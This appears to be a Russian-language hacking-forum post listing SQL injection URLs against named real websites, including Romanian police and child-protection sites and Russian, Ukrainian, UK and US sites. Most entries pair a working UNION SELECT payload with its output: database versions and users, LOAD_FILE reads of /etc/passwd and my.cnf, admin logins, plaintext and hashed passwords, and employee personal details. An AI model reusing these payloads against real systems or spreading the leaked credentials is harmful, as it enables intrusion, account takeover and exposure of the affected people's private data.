SQL Инъекции

http://www.bancuri.biz/bancuri.php?id_categ=-111+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3--

Version: 5.0.51a-log
Database: :bancuri_biz_bd
User :[email protected]



http://bancuri.biz/admin
User: Adrian
Pass: 111222

read /etc/passwd

http://www.bancuri.biz/bancuri.php?id_categ=-111+UNION+SELECT+1,LOAD_FILE(0x2F6574632F706173737764),3--

 

http://www.photo-kazan.ru

http://www.photo-kazan.ru/gallery/summer.html?users_id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(version(),0x3a,database()),user(),16,17,18+from+admin_groups+--+

юзер - photokazan_site@localhost
бд - photokazan_site
версия бд - 5.0.67-community-log

http://www.photo-kazan.ru/gallery/summer.html?users_id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,id,login,pass),15,16,17,18+from+admin_groups+--+

логин админа - admin
пароль - 123 =))))))
вот админка - http://www.photo-kazan.ru/admin

P.S. КАКОЙ ПРИДУРОК ЗАДЕФЕЙСИЛ САЙТ? ОБРАЩАЮСЬ К ПРИДУРКУ ЗАДЕФЕЙСИВШЕМУ САЙТ:
ВО ПЕРВЫХ ЭТО ТВОЙ САЙТ, ЧТО БЫ НАД НИМ ТАК ИЗДЕВАТЬСЯ?
ВО ВТОРЫХ ПОДПИСЫВАТЬСЯ HACKED BY X-@fqan ! ЗАХОДЯ С АККАУНТА АДМИНА ЭТО ПРОСТО СМЕШНО) ТЕМ БОЛЕЕ УЯЗВИМОСТЬ НАШЕЛ НЕ ТЫ.
В ТРЕТЬИХ НА АНТИЧАТЕ СОВСЕМ НЕ ОДОБРЯТЬСЯ ДЕФЕЙСИТЬ САЙТЫ!!!
В ЧЕТВЕРТЫХ Я НЕ ВЗЛАМЫВАЛ ЭТОТ САЙТ, А НАШЕЛ УЯЗВИМОСТЬ!

 

PR3

alex:946d20c91f154795805cebdefe919ef7 alex1

Database Version: 4.1.22-standard
Database name: recentne_recent2
User name: recentne_recentn@localhost

 

http://www.protectiacopilului6.ro/document.php?doc=-19+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9--

Version: 5.0.51a-log
Database: protectiacopilului6_ro_db
User:[email protected]


Read my.cnf, also can read /etc/passwd

http://www.protectiacopilului6.ro/document.php?doc=-19+UNION+SELECT+1,2,LOAD_FILE(0x2F6574632F6D792E636E66),4,5,6,7,8,9--

 

http://takafol.ru/news.php?g=0+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6+--+;&page=5

бд - db_takafol
юзер - takafol@localhost
версия бд - 4.0.23-standard

http://www.eurasica.ru/articles/-kazakh'+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+/

бд - kyrgyz2_eurasica
юзер - kyrgyz2_eurasica@localhost
версия бд - 4.1.22-log

 

rp3

Database Version: 5.0.45
Database name: endeva
User name: tom@localhost


Из базы можно вытянуть пароли из базы bebeamour (www.bebeamour.co.uk - pr3):

bebeamor:dream13dust


из базы e107: (e107.org - PR7 2002 г)

administrator:a2259f7acbf0b601de00543ccb59ef6e
Админку можно найти введя в поиск сайта "administrator"
В куках пасс md5(md5(pass)), значит a2259f7acbf0b601de00543ccb59ef6e превращаем в 80636326bb61acaa05911fc3bc1458ca, добавим ID и... в общем это только при поверхностном просмотре, а так сами копайте.


и на последок:

Database Version: 4.1.21-log
Database name: cheapelectric
User name: cheap@localhost

http://www.stand4av.co.uk/login.php

немного расшифрованных пассов...
greg:jimi55
del:eminem
Paull:123456
blaise:summer
mjaggardhilip

 

Database Version: 5.0.45-log
Database name: smarterguys_cms
User name: [email protected]

: timmd909 : clocke : [email protected]
: maxx : gramax : [email protected]

Database Version:4.1.22-log
User name:bq83845zb3@localhost
Database name:heerys_live

Database Version:4.1.22-max-log
User name:[email protected]
Database name:scottjking

Database Version: 5.0.51a-community
Database name: ddc_ddcnyccomdev
User name: ddc_ddc@localhost

Database Version: 4.1.14
Database name: CPublications
User name: siddhaji@localhost

 

PR4

Database Version: 5.0.51a-3ubuntu5.1
Database name: cms_data
User name: cms_data@localhost

debian-sys-maint:BB5CBC11A4D20B437E36051F151BA57BAD97B3BF
admin:627EAE5E81037806F9DE339F02C9C85D10371D51
pma_wOLLhjqYnwwF:B7DF9030E224B44878D02C2BDA5288F815DA29AF
horde:92F55D68BBED49E0DF482D437351073D52189ACD
cms_data:52F22AAB2B081A315B8A05AAD32623B56C19962B

 

Еще одна компания сильная...

Database Version: 5.0.51a-log
Database name: dicksondata_content
User name: [email protected]

:admin:34f816b089d7f7a6348b51bdc3290d6e : [email protected]
:test:098f6bcd4621d373cade4e832627b4f6 : [email protected] хэш MD5 : 098f6bcd4621d373cade4e832627b4f6 : test
:mlineen:0c6b9675c57f02bac9ecbe87f8e0f07b : [email protected]
:dan1:b3fd72d19e3a844c7654951596467521 : [email protected]
:abel:ebdada7950078902a3d35860d9d0952d : [email protected]


И так 41 тыщщщааа -)

 

Эх тока четвертые версии =)

Code:

http://www.itapoa.sc.gov.br/preg.php?cat=-1%20union%20select%201,2,3,version(),5,6,7,8%20--

Code:

http://www.vniispk.ru/apple.php?key=-1%20union%20select%201,2,3,version(),5--

 

Code:

http://phillygaycalendar.com/pages/col.php?id=-293+union+select+1,2,3,4,version(),6,7,8/*

4.0.27-max-log

PR: 4

 

http://www.cultura2007.ro/document.php?doc=-3+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9/*


Database Version: 5.0.22-community-nt
Database name: cultura2007-ro
User name: root@localhost

 

Code:

http://www.pev-geneve.ch/pages/col.php?id=-82+union+select+1,2,3,4,5,6,7,8,version()/*

4.1.22-standard

 

http://www.media-desk.ro/document.php?doc=-9+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*


Database Version: 5.0.22-community-nt
Database name: mediadesk_ro
User name: root@localhost

 

Ипотека
www.vrx.ru
Тиц: 1300
PR: 4
Полная информация о сотрудниках, начиная от логина/пасса на сайте, заканчивая домашним телом:

Code:

http://www.vrx.ru/ipoteka/bank.php?id=-8+union+select+1,concat_ws(0x3a,ID,DATE_REG,IPADRESS,AGENT,AGENT_TYPE,IDFIRM,LOGIN,PASS,MAILS,MAIL_PUBLIC,PHONE_AGENT,CONTACT_AGENT,BIRTHDAY,POL,IDSTATUS,ABOUT,OPEN,ACTIV_CODE),3,4,5,6,7,8,9,10,11+from+users--

Code:

http://www.vrx.ru/ipoteka/bank.php?id=-8+union+select+1,concat_ws(0x3a,ID,NAME,MAILS,LOG,PASS,PHONE,ADR,FIRM,STATUS,JOB,THEMES),3,4,5,6,7,8,9,10,11+from+v_users--

Админка:admin/ не доступна...

 

http://www.politia6.ro/document.php?doc=-240+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9--


Database Version: 5.0.67-log
Database name: politia6_db
User name: [email protected]

 

Аудиторська Фірма СЕНТАН
www.audit.uz.ua
Тиц:1400
PR:4

Code:

http://www.audit.uz.ua/ukr/news.php?id=-4+union+select+1,2,concat_ws(0x3a,id,name_i,login_i,password_i,email,is_admin,uid,applied),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+usrs--

логин/пасс:

Code:

admin:230178

-------------------------------------------
The End!

 

http://www.inforom-cultural.org/hermann/document.php?doc=-3+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,version(),database(),user()),0x71),0x71),4,5,6,7,8,9



Database Version: 4.1.18-nt
Database name: hermann_ro
User name: hermann@localhost

 

PageRank: 4

http://www.inportdover.com/ssm/shop/view_c.php?c_id=-18+union+select+1,group_concat(user_login,0x3a,user_pass),3+from+users--

admin:21232f297a57a5a743894a0e4a801fc3:admin

Database Version: 5.0.32-Debian_7etch8-log
Database name: inportdover_ssm
User name: inportdover_web@localhost

 

http://www.housexpert.ro/document.php?doc=-492+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9


Database Version: 5.0.67-log
Database name: housexpert_basic
User name: [email protected]


http://www.housexpert.ro/document.php?doc=-492+UNION+SELECT+1,2,CONCAT_WS(0x3a,id,name,username,email,password),4,5,6,7,8,9+FROM+hass.jos_users

62:Administrator:admin:[email protected]:8dfd8ac0990c9d9f3e2c7f833121aaef

pass: creation

admin panel - not found.